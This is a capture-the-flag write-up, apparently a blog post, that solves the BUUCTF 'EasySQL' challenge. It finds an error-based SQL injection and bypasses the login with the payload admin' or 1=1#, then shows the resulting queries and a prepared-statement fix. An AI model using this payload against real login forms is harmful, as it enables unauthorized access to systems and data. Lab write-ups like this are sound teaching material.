BUUCTF problem-solving notes - [Geek Challenge 2019] EasySQL 1
2022-07-06 03:03:00 【Always a teenager】
Continuing with the BUUCTF challenges today. Today's solution is [Geek Challenge 2019] EasySQL 1.
1. Basic information about the challenge
We follow the link and open the website. The result is shown below:
2. Approach
As the figure above shows, the target site is a login page. Combined with the challenge information, we can guess that the intended direction is SQL injection.
We first try a username with a single quotation mark appended, admin', in the username field. The result is shown below:
As the figure above shows, this is a simple error-based SQL injection.
Next, we append a # to the username we just used, to try to comment out everything that follows it. The result is shown below:
3. Getting the flag
From the attempts above it is easy to see that the challenge is very simple, with basically no filtering. We try the universal password: username admin' or 1=1#, any password, then click log in. The result is shown below:
As the figure above shows, we successfully obtained the challenge flag.
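The three inputs above, written out as the statements a concatenating login query would produce, followed by a parameterized version. This is an added example in MySQL syntax, not the challenge's own code: the users table, its columns, its row and the query template are assumptions.

```sql
-- Constructed stand-in for the challenge's user table (schema and row are assumptions).
-- The password is plaintext only to keep the demo short.
CREATE TABLE users (
  username VARCHAR(64) NOT NULL,
  password VARCHAR(64) NOT NULL
);
INSERT INTO users VALUES ('alice', 'constructed-password');

-- Assumed server-side template, filled in by string concatenation:
--   SELECT * FROM users WHERE username='<user>' AND password='<pass>'

-- Input 1: username admin'  password x
-- The statement becomes (kept as a comment because it does not parse):
--   SELECT * FROM users WHERE username='admin'' AND password='x'
-- The extra quote leaves a string literal unterminated, so MySQL reports a
-- syntax error. A page that echoes that error confirms the injection point.

-- Input 2: username admin'#  password x
-- '#' starts a MySQL comment, so the password test is never parsed and the
-- syntax error disappears. With this table nothing matches the name admin.
SELECT * FROM users WHERE username='admin'#' AND password='x'
;

-- Input 3: username admin' or 1=1#  password x
-- The WHERE clause is now true for every row, so a login check of the form
-- "did the query return a row?" passes without a valid password.
SELECT * FROM users WHERE username='admin' or 1=1#' AND password='x'
;

-- Fix: a prepared statement sends the input as data, never as SQL text.
-- The whole input is bound as one string value and compared literally
-- against usernames, so the quote, the OR and the '#' have no effect.
PREPARE login FROM 'SELECT * FROM users WHERE username = ? AND password = ?';
-- Same input as above; the quote is doubled only to write it as a literal.
SET @u = 'admin'' or 1=1#', @p = 'x';
EXECUTE login USING @u, @p;
DEALLOCATE PREPARE login;
```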
Original work takes effort; if you reprint this, please credit the source: https://blog.csdn.net/weixin_40228200